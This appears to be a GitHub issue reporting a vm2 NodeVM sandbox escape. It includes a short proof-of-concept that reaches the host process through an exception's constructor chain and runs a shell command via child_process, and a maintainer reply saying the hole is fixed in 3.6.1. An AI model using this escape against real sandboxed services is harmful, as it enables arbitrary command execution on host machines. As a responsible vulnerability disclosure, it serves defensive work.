You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
It's possible to escape the NodeVM through access to host objects, specifically through an exception. Some host objects are accessible from the VM's pseudo Nodejs events.
In fact, the next escape will always be there from somebody clever. Nodejs's vm module that this builds upon states:
The vm module is not a security mechanism. Do not use it to run untrusted code.
I don't believe something that builds upon it can claim to be secure to untrusted code as the README states.
const {NodeVM} = require('vm2');
nvm = new NodeVM()
nvm.run(`
try {
this.process.removeListener(); // or .on, .once, or anything that throws a host exception
}
catch (host_exception) {
console.log('host exception: ' + host_exception.toString());
host_constructor = host_exception.constructor.constructor;
host_process = host_constructor('return this')().process;
console.log('host execution: ' + host_process.mainModule.require('child_process').execSync('id').toString());
}
The text was updated successfully, but these errors were encountered:
@eugenekolo Thank you for reporting the issue; it's fixed in 3.6.1.
The statement on Node's VM module is really important because Node's internal VM is not intended to run untrusted code. That's why I started this project - to make an additional layer that makes the context secure enough to run untrusted code.
And as with every software out there that claims to be secure - it is safe until someone finds the way how to break it.
It's possible to escape the NodeVM through access to host objects, specifically through an exception. Some host objects are accessible from the VM's pseudo Nodejs events.
In fact, the next escape will always be there from somebody clever. Nodejs's vm module that this builds upon states:
I don't believe something that builds upon it can claim to be secure to untrusted code as the README states.
The text was updated successfully, but these errors were encountered: